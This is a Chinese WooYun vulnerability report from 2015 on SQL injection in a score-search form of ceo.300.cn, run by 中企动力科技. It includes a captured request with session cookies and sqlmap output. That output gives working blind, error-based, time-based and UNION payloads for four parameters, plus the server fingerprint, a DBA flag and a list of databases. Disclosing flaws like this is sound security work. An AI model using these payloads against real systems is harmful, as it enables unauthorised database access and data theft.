当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115516

漏洞标题:中企动力科技某站多处SQL注射和主站同库

相关厂商:中企动力科技股份有限公司

漏洞作者: 路人甲

提交时间:2015-05-22 14:23

修复时间:2015-07-06 14:44

公开时间:2015-07-06 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-21: 细节向实习白帽子公开
2015-07-06: 细节向公众公开

简要描述:

233

详细说明:

POST /index.php/ceo8/score_search HTTP/1.1
Content-Length: 219
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: ceo.300.cn
Cookie: PHPSESSID=c77f287218eb0d9ef130233f579f555a; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2231dc2ba03ac9a7c6b82258f8245df15e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22114.247.50.2%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F28.0.1500.63+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1432268440%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D828f1920aae767c0ff6c60467c406382
Host: ceo.300.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
search_area=1&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
POST /index.php/ceo8/score_adds处这几个参数,还有type

漏洞证明:

---
Parameter: search_department1 (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8' RLIKE (SELECT (CASE WHEN (6009=6009) THEN 0x256539253833256138256539253937256138 ELSE 0x28 END)) AND 'yHNU'='yHNU&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8' AND (SELECT 6001 FROM(SELECT COUNT(*),CONCAT(0x716a7a6271,(SELECT (ELT(6001=6001,1))),0x7171706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MCeu'='MCeu&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8' AND (SELECT * FROM (SELECT(SLEEP(5)))DmkF) AND 'XkoZ'='XkoZ&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a6271,0x565169486c53636c4f72,0x7171706b71),NULL-- &search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
Parameter: search_name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d' RLIKE (SELECT (CASE WHEN (3382=3382) THEN 0x256535253931253938256535256237256135256535256137253933256535253930253864 ELSE 0x28 END)) AND 'tsdD'='tsdD&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d' AND (SELECT 8088 FROM(SELECT COUNT(*),CONCAT(0x716a7a6271,(SELECT (ELT(8088=8088,1))),0x7171706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VEDN'='VEDN&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d' AND (SELECT * FROM (SELECT(SLEEP(5)))yqmX) AND 'vjyw'='vjyw&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a6271,0x6f696a786f4c46696a42,0x7171706b71),NULL,NULL,NULL,NULL-- &search_staff_id=%e5%91%98%e5%b7%a5ID
Parameter: search_branch (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b' RLIKE (SELECT (CASE WHEN (1714=1714) THEN 0x256539253964253932256535256232253962 ELSE 0x28 END)) AND 'cjJj'='cjJj&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b' AND (SELECT 1156 FROM(SELECT COUNT(*),CONCAT(0x716a7a6271,(SELECT (ELT(1156=1156,1))),0x7171706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hzJB'='hzJB&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b' AND (SELECT * FROM (SELECT(SLEEP(5)))KxHQ) AND 'BErC'='BErC&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: search_area=1&search_branch=%e9%9d%92%e5%b2%9b' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a6271,0x564b4d74446d4b4d5878,0x7171706b71),NULL,NULL-- &search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
Parameter: search_area (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: search_area=1' RLIKE (SELECT (CASE WHEN (2026=2026) THEN 1 ELSE 0x28 END)) AND 'hDIn'='hDIn&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: search_area=1' AND (SELECT 4083 FROM(SELECT COUNT(*),CONCAT(0x716a7a6271,(SELECT (ELT(4083=4083,1))),0x7171706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ABgp'='ABgp&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: search_area=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Ywfy) AND 'ukpo'='ukpo&search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: search_area=1' UNION ALL SELECT CONCAT(0x716a7a6271,0x4548534565424e6b7146,0x7171706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &search_branch=%e9%9d%92%e5%b2%9b&search_department1=%e9%83%a8%e9%97%a8&search_name=%e5%91%98%e5%b7%a5%e5%a7%93%e5%90%8d&search_staff_id=%e5%91%98%e5%b7%a5ID
---
web server operating system: Windows 7
web application technology: Apache 2.0.54, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA:    True
available databases [14]:
[*] #mysql50#lost+found
[*] 15th
[*] ce
[*] ce300
[*] ceo8
[*] information_schema
[*] mascot
[*] mysql
[*] quartz
[*] survey
[*] test
[*] yidaba_sicms
[*] zhuanjia
[*] zmobile
表不贴出来了,大量信息
!!!!!!!!!!!!!!!!!!!!!
支持union,可秒脱裤子

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-22 14:42

厂商回复:

正在处理。

最新状态:

暂无